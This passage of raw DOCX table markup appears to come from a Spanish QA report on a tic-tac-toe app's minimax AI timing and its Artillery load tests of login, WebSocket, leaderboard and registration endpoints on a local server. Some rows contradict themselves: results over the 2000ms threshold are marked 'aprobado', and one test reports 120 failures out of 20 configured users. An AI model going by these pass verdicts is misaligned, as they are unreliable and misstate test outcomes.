              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">p95 ≤ 2000ms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">p95 &lt; 3401ms en tablero vacío (minimax completo). Resto &lt; 15ms. Todos pasan umbral.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Motor IA
getAIMove() — Hard</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Funciones IA importadas.</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1. Ejecutar 50 iteraciones con minimax completo en modo hard.
2. Medir p95 por tablero.</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p95 ≤ 2000ms en todos los tableros.</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Tablero vacío: p95 = 10143ms (excede umbral en ejecución interna). Tablero 3+ fichas: p95 &lt; 25ms. Hard vacío es el caso más costoso.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Motor IA
getAIMove() — Hard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Tablero con 8 fichas colocadas (índice 8 libre).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Ejecutar getAIMove con una sola celda libre.
2. Verificar índice retornado y tiempo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">move === 8. Tiempo &lt; 50ms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">move === 8 correctamente. Tiempo &lt; 1ms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="6"/>
            <w:shd w:fill="003DA5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-R-01 — Login bajo carga normal (Artillery — 10 usuarios concurrentes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
POST /auth/login</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Backend corriendo en :4000.
Usuario loadtest@test.com en BD.
Artillery instalado.</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1. Ramp-up: 10 usuarios en 5s.
2. POST /auth/login con credenciales válidas por cada VU.
3. Medir p95 y tasa de error.</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p95 ≤ 2000ms. Error rate &lt; 1%. 10/10 VUs completados.</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p95 = 7.9ms. Error rate = 0%. 10/10 VUs completados. HTTP 200 en todos los intentos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="6"/>
            <w:shd w:fill="003DA5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-R-02 — Jugadas WebSocket concurrentes (Artillery — 20 jugadores) [FALLA]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">WebSocket
/ws jugadas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Backend corriendo en :4000.
Artillery WebSocket engine.
20 VUs configurados.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. 20 VUs conectan a ws://localhost:4000/ws.
2. Cada VU envía join → 3 moves → ping.
3. Medir conexiones exitosas y errores.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Tasa de error &lt; 1%. VUs completados sin ECONNRESET.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">120/120 VUs fallaron (100%). Errores: ECONNRESET=120, socket hang up=120. El servidor termina la conexión al recibir moves sin partida activa (falta de opponent).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FCE4D6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">falla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="6"/>
            <w:shd w:fill="003DA5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-R-04 — Leaderboard bajo carga alta (Artillery — 100 usuarios concurrentes) [FALLA]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Leaderboard
GET /leaderboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Backend corriendo en :4000.
Usuario loadtest en BD.
Artillery instalado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Ramp-up: 100 usuarios en 10s.
2. Cada VU: POST /auth/login → GET /leaderboard × 2.
3. Medir p95 y VUs completados.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">p95 ≤ 2000ms. Error rate &lt; 1%. 100/100 VUs completados.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">p95 HTTP = 5ms. 36/100 VUs completados. 64/100 fallaron (ERR_SOCKET_TIMEOUT). Backend no sostiene 100 concurrentes bajo carga de BD en memoria.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FCE4D6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">falla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="6"/>
            <w:shd w:fill="003DA5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-R-06 — Registro masivo de usuarios (Artillery — 200 concurrentes) [FALLA]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
POST /auth/register</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Backend corriendo en :4000.
Artillery instalado.</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1. Ramp-up: 200 usuarios registrándose en 20s con emails únicos aleatorios.
2. Medir tasa de éxito y p95.</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p95 ≤ 2000ms. Tasa de éxito ≥ 95% (190+/200 HTTP 201).</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0/200 VUs completados (100% de falla). ECONNREFUSED=31, ERR_SOCKET_TIMEOUT=169. Backend incapaz de sostener 200 conexiones simultáneas de escritura.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FCE4D6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">falla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="6"/>
            <w:shd w:fill="003DA5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-R-09 — Login bajo estrés extremo (Artillery — 500 VUs) [FALLA]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
POST /auth/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Backend corriendo en :4000.
Artillery instalado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Calentamiento 50 VUs por 10s.
2. Ramp-up a 500 VUs en 30s.
3. Pico 500 VUs durante 30s.
4. Recuperación a 5 VUs en 20s.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Error rate &lt; 5% en fase de pico.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
